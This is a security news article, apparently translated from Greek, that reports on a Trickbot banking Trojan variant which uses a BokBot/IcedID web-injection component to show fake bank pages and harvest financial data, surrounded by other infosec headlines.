White hat hacker is accused of hacking Bulgaria's tax office
infosec

White hat hacker is accused of hacking Bulgaria's tax office

An expert in the field of cyber security and white hat hacker, who is accused of hacking the data more than ...
Read More
infosec

FSB: Hackers have violated the Russian Security Service!

Hackers have violated the servers of the Russian Federal Security Service (FSB) by gaining access to 7.5 terabytes of data from a major Sybate FSB contractor. The...
Read More
infosec

Chrome & Firefox extensions stole millions of data

A huge leak of data was discovered by security researcher Sam Jidali and his team. Leakage came from 8 ...
Read More
infosec

The first Online Mobile Malware Observation for Android from Upstream

Secure-D, the Upstream security platform, the leading Greek technology company, launches the first online Mobile Malware Observatory with ...
Read More
infosec

Password Alert: 72% of users are recycling passwords!

Password Alert: Users recycle the same password on average four times, according to a Security.org report ....
Read More
Latest Posts

Variation of Trickbot Trojan is targeted at banking

trickbot

It seems that the creators of the notorious Trickbot Trojan, continue to evolve their malicious software by adding a new custom item derived from the BokBot code used in Web Injections attacks and affecting popular browsers.

BokBot, also known as IcedID, was first discovered by IBM's X-Force team at the end of 2017 and is also a banking trojan. It has the ability to redirect its victims to bogus online banking sites, but also to cling to a browser and to promote fake content on the front pages of banks.

Security researcher Brad Duncan recently saw Trickbot containing the new web injection element being downloaded by Ursnif (aka Gozi ISFB) malware.

The attack starts with an infected Office Word file that runs one PowerShell script to download trojan Ursnif. The infected device also receives the Trickbot variant containing the BokBot / IcedID component, which can track and modify the data flow on the web.

A system infected with the new version of Trickbot was discovered in July 5 and contains a configuration file.

Another security researcher, who also studied the new element of Trojan, Vitali Kremez, found that he can connect to browsers Google Chrome, Mozilla Firefox Internet Explorer and Microsoft Edge.

Analyzing it most, their similarity was discovered with the BokBot man-in-the-browser tool, used to promote false data in the victim's results.

In a thread at Twitter, Kremez notes that the interesting part is that this item seems to have been tailored specifically to TrickBot or other fraudulent banking based on the installer of this family malware.

The malicious add-on acts as a local proxy server, located between the customer and the online banking service. From this point, he can enter a fake profile of the bank that the user searched for and collect financial information.

Share
Do you have an opinion? Leave your comment.

The author allows you to copy his / her text only if you report the source (SecNews.gr), as an e-mail address (Live URL) of the article.
Updated on by

Reader Interactions

Leave a reply

Your email address is not published. Τα υποχρεωτικά πεδία σημειώνονται με *